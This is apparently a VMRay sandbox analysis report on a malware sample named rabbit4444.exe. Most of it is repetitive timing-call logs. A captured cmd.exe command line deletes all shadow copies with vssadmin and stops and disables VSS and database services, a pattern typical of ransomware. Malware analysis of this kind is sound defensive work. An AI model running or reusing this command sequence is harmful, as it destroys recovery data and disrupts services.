Get Time type = Performance Ctr, time = 14182220118 True 1
Fn
Get Time type = Performance Ctr, time = 14182371622 True 1
Fn
Get Time type = Performance Ctr, time = 14182894889 True 1
Fn
Get Time type = Performance Ctr, time = 14183108424 True 1
Fn
Get Time type = Performance Ctr, time = 14183386862 True 1
Fn
Get Time type = Performance Ctr, time = 14183631842 True 1
Fn
Get Time type = Performance Ctr, time = 14183918434 True 1
Fn
Get Time type = Performance Ctr, time = 14184211977 True 1
Fn
Get Time type = Performance Ctr, time = 14184523289 True 1
Fn
Get Time type = Performance Ctr, time = 14184664242 True 1
Fn
Get Time type = Performance Ctr, time = 14184919243 True 1
Fn
Get Time type = Performance Ctr, time = 14185133810 True 1
Fn
Get Time type = Performance Ctr, time = 14185409890 True 1
Fn
Get Time type = Performance Ctr, time = 14185637322 True 1
Fn
Get Time type = Performance Ctr, time = 14186083970 True 1
Fn
Get Time type = Performance Ctr, time = 14186362068 True 1
Fn
Get Time type = Performance Ctr, time = 14191412802 True 1
Fn
Get Time type = Performance Ctr, time = 14191691591 True 1
Fn
Get Time type = Performance Ctr, time = 14199948650 True 1
Fn
Get Time type = Performance Ctr, time = 14200235704 True 1
Fn
Get Time type = Performance Ctr, time = 14200477310 True 1
Fn
Get Time type = Performance Ctr, time = 14200723495 True 1
Fn
Get Time type = Performance Ctr, time = 14201057929 True 1
Fn
Get Time type = Performance Ctr, time = 14202089036 True 1
Fn
Get Time type = Performance Ctr, time = 14203435726 True 1
Fn
Get Time type = Performance Ctr, time = 14203975895 True 1
Fn
Get Time type = Performance Ctr, time = 14204314484 True 1
Fn
Get Time type = Performance Ctr, time = 14204612200 True 1
Fn
Get Time type = Performance Ctr, time = 14204856691 True 1
Fn
Get Time type = Performance Ctr, time = 14205729545 True 1
Fn
Get Time type = Performance Ctr, time = 14206230927 True 1
Fn
Get Time type = Performance Ctr, time = 14207923169 True 1
Fn
Get Time type = Performance Ctr, time = 14208677239 True 1
Fn
Get Time type = Performance Ctr, time = 14209123129 True 1
Fn
Get Time type = Performance Ctr, time = 14209368611 True 1
Fn
Get Time type = Performance Ctr, time = 14239199987 True 1
Fn
Get Time type = Performance Ctr, time = 14240343387 True 1
Fn
Get Time type = Performance Ctr, time = 14240870577 True 1
Fn
Get Time type = Performance Ctr, time = 14241114167 True 1
Fn
Get Time type = Performance Ctr, time = 14243133990 True 1
Fn
Get Time type = Performance Ctr, time = 14244041052 True 1
Fn
Get Time type = Performance Ctr, time = 14244357523 True 1
Fn
Get Time type = Performance Ctr, time = 14244548962 True 1
Fn
Get Time type = Performance Ctr, time = 14244906941 True 1
Fn
Get Time type = Performance Ctr, time = 14245357914 True 1
Fn
Get Time type = Performance Ctr, time = 14246109928 True 1
Fn
Get Time type = Performance Ctr, time = 14246390066 True 1
Fn
Get Time type = Performance Ctr, time = 14273047719 True 1
Fn
Get Time type = Performance Ctr, time = 14274233113 True 1
Fn
Get Time type = Performance Ctr, time = 14279639821 True 1
Fn
Get Time type = Performance Ctr, time = 14279868361 True 1
Fn
Get Time type = Performance Ctr, time = 14312255628 True 1
Fn
Get Time type = Performance Ctr, time = 14312623444 True 1
Fn
Get Time type = Performance Ctr, time = 14313020982 True 1
Fn
Get Time type = Performance Ctr, time = 14313216239 True 1
Fn
Get Time type = Performance Ctr, time = 14313551859 True 1
Fn
Get Time type = Performance Ctr, time = 14313938765 True 1
Fn
Get Time type = Performance Ctr, time = 14314374161 True 1
Fn
Get Time type = Performance Ctr, time = 14314576705 True 1
Fn
Get Time type = Performance Ctr, time = 14314918911 True 1
Fn
Get Time type = Performance Ctr, time = 14315305375 True 1
Fn
Get Time type = Performance Ctr, time = 14315659237 True 1
Fn
Get Time type = Performance Ctr, time = 14315900977 True 1
Fn
Get Time type = Performance Ctr, time = 14316496411 True 1
Fn
Get Time type = Performance Ctr, time = 14316752458 True 1
Fn
Get Time type = Performance Ctr, time = 14317071436 True 1
Fn
Get Time type = Performance Ctr, time = 14317312475 True 1
Fn
Get Time type = Performance Ctr, time = 14317619405 True 1
Fn
Get Time type = Performance Ctr, time = 14317803275 True 1
Fn
Get Time type = Performance Ctr, time = 14318099264 True 1
Fn
Get Time type = Performance Ctr, time = 14318282198 True 1
Fn
Get Time type = Performance Ctr, time = 14319163515 True 1
Fn
Get Time type = Performance Ctr, time = 14319495169 True 1
Fn
Get Time type = Performance Ctr, time = 14320089383 True 1
Fn
Get Time type = Performance Ctr, time = 14323517848 True 1
Fn
Get Time type = Performance Ctr, time = 14323796795 True 1
Fn
Get Time type = Performance Ctr, time = 14324024565 True 1
Fn
Get Time type = Performance Ctr, time = 14324297260 True 1
Fn
Get Time type = Performance Ctr, time = 14325888905 True 1
Fn
Get Time type = Performance Ctr, time = 14326650038 True 1
Fn
Get Time type = Performance Ctr, time = 14328650798 True 1
Fn
Get Time type = Performance Ctr, time = 14328925185 True 1
Fn
Get Time type = Performance Ctr, time = 14329295974 True 1
Fn
Get Time type = Performance Ctr, time = 14329591718 True 1
Fn
Get Time type = Performance Ctr, time = 14333162417 True 1
Fn
Get Time type = Performance Ctr, time = 14333691864 True 1
Fn
Get Time type = Performance Ctr, time = 14335928929 True 1
Fn
Get Time type = Performance Ctr, time = 14336257161 True 1
Fn
Get Time type = Performance Ctr, time = 14336502952 True 1
Fn
Get Time type = Performance Ctr, time = 14336888877 True 1
Fn
Get Time type = Performance Ctr, time = 14340542655 True 1
Fn
Get Time type = Performance Ctr, time = 14340824016 True 1
Fn
Get Time type = Performance Ctr, time = 14341069527 True 1
Fn
Get Time type = Performance Ctr, time = 14341354670 True 1
Fn
Get Time type = Performance Ctr, time = 14341624004 True 1
Fn
Get Time type = Performance Ctr, time = 14341860018 True 1
Fn
Get Time type = Performance Ctr, time = 14344207260 True 1
Fn
Get Time type = Performance Ctr, time = 14344497737 True 1
Fn
Get Time type = Performance Ctr, time = 14347711309 True 1
Fn
Get Time type = Performance Ctr, time = 14348108978 True 1
Fn
Get Time type = Performance Ctr, time = 14348389782 True 1
Fn
Get Time type = Performance Ctr, time = 14348901226 True 1
Fn
Get Time type = Performance Ctr, time = 14350858114 True 1
Fn
Get Time type = Performance Ctr, time = 14351092234 True 1
Fn
Get Time type = Performance Ctr, time = 14351348507 True 1
Fn
Get Time type = Performance Ctr, time = 14351715463 True 1
Fn
Get Time type = Performance Ctr, time = 14351921193 True 1
Fn
Get Time type = Performance Ctr, time = 14352171734 True 1
Fn
Get Time type = Performance Ctr, time = 14352766383 True 1
Fn
Get Time type = Performance Ctr, time = 14353193501 True 1
Fn
Get Time type = Performance Ctr, time = 14353433732 True 1
Fn
Get Time type = Performance Ctr, time = 14353702695 True 1
Fn
Get Time type = Performance Ctr, time = 14354845196 True 1
Fn
Get Time type = Performance Ctr, time = 14355301664 True 1
Fn
Get Time type = Performance Ctr, time = 14358915276 True 1
Fn
Get Time type = Performance Ctr, time = 14359213563 True 1
Fn
Get Time type = Performance Ctr, time = 14366619240 True 1
Fn
Get Time type = Performance Ctr, time = 14366903734 True 1
Fn
Get Time type = Performance Ctr, time = 14368400351 True 1
Fn
Get Time type = Performance Ctr, time = 14369771085 True 1
Fn
Get Time type = Performance Ctr, time = 14370359962 True 1
Fn
Get Time type = Performance Ctr, time = 14370889828 True 1
Fn
Get Time type = Performance Ctr, time = 14371098666 True 1
Fn
Get Time type = Performance Ctr, time = 14372736497 True 1
Fn
Get Time type = Performance Ctr, time = 14389209918 True 1
Fn
Get Time type = Performance Ctr, time = 14389444213 True 1
Fn
Get Time type = Performance Ctr, time = 14391415363 True 1
Fn
Get Time type = Performance Ctr, time = 14391697136 True 1
Fn
Get Time type = Performance Ctr, time = 14393669105 True 1
Fn
Get Time type = Performance Ctr, time = 14393908582 True 1
Fn
Get Time type = Performance Ctr, time = 14394444757 True 1
Fn
Get Time type = Performance Ctr, time = 14394729985 True 1
Fn
Get Time type = Performance Ctr, time = 14396356800 True 1
Fn
Get Time type = Performance Ctr, time = 14396640180 True 1
Fn
Get Time type = Performance Ctr, time = 14396927336 True 1
Fn
Get Time type = Performance Ctr, time = 14397243219 True 1
Fn
Get Time type = Performance Ctr, time = 14397507936 True 1
Fn
Get Time type = Performance Ctr, time = 14397763366 True 1
Fn
Get Time type = Performance Ctr, time = 14398035133 True 1
Fn
Get Time type = Performance Ctr, time = 14401163131 True 1
Fn
Get Time type = Performance Ctr, time = 14401859549 True 1
Fn
Get Time type = Performance Ctr, time = 14402148044 True 1
Fn
Get Time type = Performance Ctr, time = 14402357043 True 1
Fn
Get Time type = Performance Ctr, time = 14403428258 True 1
Fn
Get Time type = Performance Ctr, time = 14406114462 True 1
Fn
Get Time type = Performance Ctr, time = 14406743856 True 1
Fn
Get Time type = Performance Ctr, time = 14406955291 True 1
Fn
Get Time type = Performance Ctr, time = 14407429766 True 1
Fn
Get Time type = Performance Ctr, time = 14413470306 True 1
Fn
Get Time type = Performance Ctr, time = 14414205053 True 1
Fn
Get Time type = Performance Ctr, time = 14416064505 True 1
Fn
Get Time type = Performance Ctr, time = 14416365866 True 1
Fn
Get Time type = Performance Ctr, time = 14426066141 True 1
Fn
Get Time type = Performance Ctr, time = 14429440585 True 1
Fn
Get Time type = Performance Ctr, time = 14444983942 True 1
Fn
Get Time type = Performance Ctr, time = 14454842329 True 1
Fn
Get Time type = Performance Ctr, time = 14465545885 True 1
Fn
Get Time type = Performance Ctr, time = 14465826044 True 1
Fn
Get Time type = Performance Ctr, time = 14466436196 True 1
Fn
Get Time type = Performance Ctr, time = 14466875607 True 1
Fn
Get Time type = Performance Ctr, time = 14469697609 True 1
Fn
Get Time type = Performance Ctr, time = 14470909295 True 1
Fn
Get Time type = Performance Ctr, time = 14471398569 True 1
Fn
Get Time type = Performance Ctr, time = 14472823799 True 1
Fn
Get Time type = Performance Ctr, time = 14473335369 True 1
Fn
Get Time type = Performance Ctr, time = 14474591466 True 1
Fn
Get Time type = Performance Ctr, time = 14475114340 True 1
Fn
Get Time type = Performance Ctr, time = 14476206167 True 1
Fn
Get Time type = Performance Ctr, time = 14476689676 True 1
Fn
Get Time type = Performance Ctr, time = 14477738895 True 1
Fn
Get Time type = Performance Ctr, time = 14478169057 True 1
Fn
Get Time type = Performance Ctr, time = 14479217515 True 1
Fn
Get Time type = Performance Ctr, time = 14479737109 True 1
Fn
Get Time type = Performance Ctr, time = 14480858951 True 1
Fn
Get Time type = Performance Ctr, time = 14481317218 True 1
Fn
Get Time type = Performance Ctr, time = 14482441770 True 1
Fn
Get Time type = Performance Ctr, time = 14482902739 True 1
Fn
Get Time type = Performance Ctr, time = 14483880269 True 1
Fn
Get Time type = Performance Ctr, time = 14484267261 True 1
Fn
Get Time type = Performance Ctr, time = 14485230249 True 1
Fn
Get Time type = Performance Ctr, time = 14485666865 True 1
Fn
Get Time type = Performance Ctr, time = 14486890721 True 1
Fn
Get Time type = Performance Ctr, time = 14487346138 True 1
Fn
Get Time type = Performance Ctr, time = 14488642702 True 1
Fn
Get Time type = Performance Ctr, time = 14491530966 True 1
Fn
Get Time type = Performance Ctr, time = 14492712409 True 1
Fn
Get Time type = Performance Ctr, time = 14493085778 True 1
Fn
Get Time type = Performance Ctr, time = 14493836515 True 1
Fn
Get Time type = Performance Ctr, time = 14504472334 True 1
Fn
Get Time type = Performance Ctr, time = 14505391315 True 1
Fn
Get Time type = Performance Ctr, time = 14508110360 True 1
Fn
Get Time type = Performance Ctr, time = 14508439664 True 1
Fn
Get Time type = Performance Ctr, time = 14513383821 True 1
Fn
Get Time type = Performance Ctr, time = 14513653980 True 1
Fn
Get Time type = Performance Ctr, time = 14516673870 True 1
Fn
Get Time type = Performance Ctr, time = 14517070549 True 1
Fn
Get Time type = Performance Ctr, time = 14518965762 True 1
Fn
Get Time type = Performance Ctr, time = 14519200688 True 1
Fn
Get Time type = Performance Ctr, time = 14538916286 True 1
Fn
Get Time type = Performance Ctr, time = 14539305706 True 1
Fn
Get Time type = Performance Ctr, time = 14540637768 True 1
Fn
Get Time type = Performance Ctr, time = 14540877180 True 1
Fn
Get Time type = Performance Ctr, time = 14541073792 True 1
Fn
Get Time type = Performance Ctr, time = 14541352828 True 1
Fn
Get Time type = Performance Ctr, time = 14542567891 True 1
Fn
Get Time type = Performance Ctr, time = 14542863043 True 1
Fn
Get Time type = Performance Ctr, time = 14543074703 True 1
Fn
Get Time type = Performance Ctr, time = 14543380502 True 1
Fn
Get Time type = Performance Ctr, time = 14549422863 True 1
Fn
Get Time type = Performance Ctr, time = 14549657631 True 1
Fn
Get Time type = Performance Ctr, time = 14559856495 True 1
Fn
Get Time type = Performance Ctr, time = 14560045215 True 1
Fn
Get Time type = Performance Ctr, time = 14560836682 True 1
Fn
Get Time type = Performance Ctr, time = 14561143426 True 1
Fn
Get Time type = Performance Ctr, time = 14561428101 True 1
Fn
Get Time type = Performance Ctr, time = 14561745748 True 1
Fn
Get Time type = Performance Ctr, time = 14562048262 True 1
Fn
Get Time type = Performance Ctr, time = 14562494942 True 1
Fn
Get Time type = Performance Ctr, time = 14562703359 True 1
Fn
Get Time type = Performance Ctr, time = 14562888157 True 1
Fn
Get Time type = Performance Ctr, time = 14563168021 True 1
Fn
Get Time type = Performance Ctr, time = 14563331953 True 1
Fn
Get Time type = Performance Ctr, time = 14564614166 True 1
Fn
Get Time type = Performance Ctr, time = 14564848154 True 1
Fn
Get Time type = Performance Ctr, time = 14565114290 True 1
Fn
Get Time type = Performance Ctr, time = 14565530679 True 1
Fn
Get Time type = Performance Ctr, time = 14566036237 True 1
Fn
Get Time type = Performance Ctr, time = 14566584968 True 1
Fn
Get Time type = Performance Ctr, time = 14566814568 True 1
Fn
Get Time type = Performance Ctr, time = 14567118769 True 1
Fn
Get Time type = Performance Ctr, time = 14567334997 True 1
Fn
Get Time type = Performance Ctr, time = 14567843813 True 1
Fn
Get Time type = Performance Ctr, time = 14568107013 True 1
Fn
Get Time type = Performance Ctr, time = 14568519038 True 1
Fn
Get Time type = Performance Ctr, time = 14581029310 True 1
Fn
Get Time type = Performance Ctr, time = 14581463965 True 1
Fn
Get Time type = Performance Ctr, time = 14585576770 True 1
Fn
Get Time type = Performance Ctr, time = 14585945857 True 1
Fn
Get Time type = Performance Ctr, time = 14590819677 True 1
Fn
Get Time type = Performance Ctr, time = 14591217699 True 1
Fn
Get Time type = Performance Ctr, time = 14591819521 True 1
Fn
Get Time type = Performance Ctr, time = 14606494361 True 1
Fn
Get Time type = Performance Ctr, time = 14608340228 True 1
Fn
Get Time type = Performance Ctr, time = 14618159717 True 1
Fn
Get Time type = Performance Ctr, time = 14629031376 True 1
Fn
Get Time type = Performance Ctr, time = 14669481425 True 1
Fn
Get Time type = Performance Ctr, time = 14669792895 True 1
Fn
Get Time type = Performance Ctr, time = 14683447319 True 1
Fn
Get Time type = Performance Ctr, time = 14685308155 True 1
Fn
Get Time type = Performance Ctr, time = 14685460469 True 1
Fn
Get Time type = Performance Ctr, time = 14685731216 True 1
Fn
Get Time type = Performance Ctr, time = 14685982030 True 1
Fn
Get Time type = Performance Ctr, time = 14686296802 True 1
Fn
Get Time type = Performance Ctr, time = 14686602009 True 1
Fn
Get Time type = Performance Ctr, time = 14686916023 True 1
Fn
Get Time type = Performance Ctr, time = 14687033547 True 1
Fn
Get Time type = Performance Ctr, time = 14687669924 True 1
Fn
Get Time type = Performance Ctr, time = 14687846255 True 1
Fn
Get Time type = Performance Ctr, time = 14688237094 True 1
Fn
Get Time type = Performance Ctr, time = 14688419130 True 1
Fn
Get Time type = Performance Ctr, time = 14688700059 True 1
Fn
Get Time type = Performance Ctr, time = 14688932613 True 1
Fn
Get Time type = Performance Ctr, time = 14689244713 True 1
Fn
Get Time type = Performance Ctr, time = 14689440767 True 1
Fn
Get Time type = Performance Ctr, time = 14689742105 True 1
Fn
Get Time type = Performance Ctr, time = 14689849983 True 1
Fn
Get Time type = Performance Ctr, time = 14690091817 True 1
Fn
Get Time type = Performance Ctr, time = 14690309521 True 1
Fn
Get Time type = Performance Ctr, time = 14690595230 True 1
Fn
Get Time type = Performance Ctr, time = 14690776679 True 1
Fn
Get Time type = Performance Ctr, time = 14691140410 True 1
Fn
Get Time type = Performance Ctr, time = 14691386458 True 1
Fn
Get Time type = Performance Ctr, time = 14692146354 True 1
Fn
Get Time type = Performance Ctr, time = 14692431639 True 1
Fn
Get Time type = Performance Ctr, time = 14692759082 True 1
Fn
Get Time type = Performance Ctr, time = 14692993211 True 1
Fn
Get Time type = Performance Ctr, time = 14693299914 True 1
Fn
Get Time type = Performance Ctr, time = 14693559057 True 1
Fn
Get Time type = Performance Ctr, time = 14693867372 True 1
Fn
Get Time type = Performance Ctr, time = 14694076549 True 1
Fn
Get Time type = Performance Ctr, time = 14694394489 True 1
Fn
Get Time type = Performance Ctr, time = 14694555535 True 1
Fn
Get Time type = Performance Ctr, time = 14694819414 True 1
Fn
Get Time type = Performance Ctr, time = 14695951001 True 1
Fn
Get Time type = Performance Ctr, time = 14696274199 True 1
Fn
Get Time type = Performance Ctr, time = 14696402611 True 1
Fn
Get Time type = Performance Ctr, time = 14696650632 True 1
Fn
Get Time type = Performance Ctr, time = 14696805260 True 1
Fn
Get Time type = Performance Ctr, time = 14697332520 True 1
Fn
Get Time type = Performance Ctr, time = 14697438291 True 1
Fn
Get Time type = Performance Ctr, time = 14697812268 True 1
Fn
Get Time type = Performance Ctr, time = 14697993335 True 1
Fn
Get Time type = Performance Ctr, time = 14698258881 True 1
Fn
Get Time type = Performance Ctr, time = 14698492487 True 1
Fn
Get Time type = Performance Ctr, time = 14698768146 True 1
Fn
Get Time type = Performance Ctr, time = 14699102942 True 1
Fn
Get Time type = Performance Ctr, time = 14699419153 True 1
Fn
Get Time type = Performance Ctr, time = 14699681553 True 1
Fn
Get Time type = Performance Ctr, time = 14700019831 True 1
Fn
Get Time type = Performance Ctr, time = 14700162414 True 1
Fn
Get Time type = Performance Ctr, time = 14700414440 True 1
Fn
Get Time type = Performance Ctr, time = 14700584089 True 1
Fn
Get Time type = Performance Ctr, time = 14700827295 True 1
Fn
Get Time type = Performance Ctr, time = 14701081304 True 1
Fn
Get Time type = Performance Ctr, time = 14701608863 True 1
Fn
Get Time type = Performance Ctr, time = 14701814766 True 1
Fn
Get Time type = Performance Ctr, time = 14706644447 True 1
Fn
Get Time type = Performance Ctr, time = 14706917727 True 1
Fn
Get Time type = Performance Ctr, time = 14729547806 True 1
Fn
Get Time type = Performance Ctr, time = 14730004489 True 1
Fn
Get Time type = Performance Ctr, time = 14730454785 True 1
Fn
Get Time type = Performance Ctr, time = 14730831344 True 1
Fn
Get Time type = Performance Ctr, time = 14740462662 True 1
Fn
Get Time type = Performance Ctr, time = 14740831499 True 1
Fn
Get Time type = Performance Ctr, time = 14741106563 True 1
Fn
Get Time type = Performance Ctr, time = 14741405885 True 1
Fn
Get Time type = Performance Ctr, time = 14750157450 True 1
Fn
Get Time type = Performance Ctr, time = 14750537235 True 1
Fn
Get Time type = Performance Ctr, time = 14750810840 True 1
Fn
Get Time type = Performance Ctr, time = 14751103692 True 1
Fn
Get Time type = Performance Ctr, time = 14757064920 True 1
Fn
Get Time type = Performance Ctr, time = 14757301818 True 1
Fn
Get Time type = Performance Ctr, time = 14757522845 True 1
Fn
Get Time type = Performance Ctr, time = 14757774476 True 1
Fn
Get Time type = Performance Ctr, time = 14758083726 True 1
Fn
Get Time type = Performance Ctr, time = 14758347326 True 1
Fn
Get Time type = Performance Ctr, time = 14758927943 True 1
Fn
Get Time type = Performance Ctr, time = 14759309390 True 1
Fn
Get Time type = Performance Ctr, time = 14759576677 True 1
Fn
Get Time type = Performance Ctr, time = 14759821102 True 1
Fn
Get Time type = Performance Ctr, time = 14760113544 True 1
Fn
Get Time type = Performance Ctr, time = 14760359549 True 1
Fn
Get Time type = Performance Ctr, time = 14760697500 True 1
Fn
Get Time type = Performance Ctr, time = 14760940080 True 1
Fn
Get Time type = Performance Ctr, time = 14761191439 True 1
Fn
Get Time type = Performance Ctr, time = 14761428407 True 1
Fn
Get Time type = Performance Ctr, time = 14761661881 True 1
Fn
Get Time type = Performance Ctr, time = 14761904853 True 1
Fn
Get Time type = Performance Ctr, time = 14762190962 True 1
Fn
Get Time type = Performance Ctr, time = 14762467129 True 1
Fn
Get Time type = Performance Ctr, time = 14762716293 True 1
Fn
Get Time type = Performance Ctr, time = 14763207526 True 1
Fn
For performance reasons, the remaining 5 entries are omitted.
The remaining entries can be found in glog.xml.
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Get Environment String name = allusersprofile, result_out = C:\ProgramData True 1
Fn
Process #2: cmd.exe
50 0
»
Information Value
ID #2
File Name c:\windows\syswow64\cmd.exe
Command Line Truncated command line: C:\WINDOWS\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWr...
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:00:43, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0xcb8
Parent PID 0xcdc (c:\users\fd1hvy\desktop\rabbit4444.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 7F0
0x DB8
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\FD1HVy\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 4
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 197, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0xbd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75e90000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75ea4f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75ea4330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75ea5930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\FD1HVy\Desktop True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image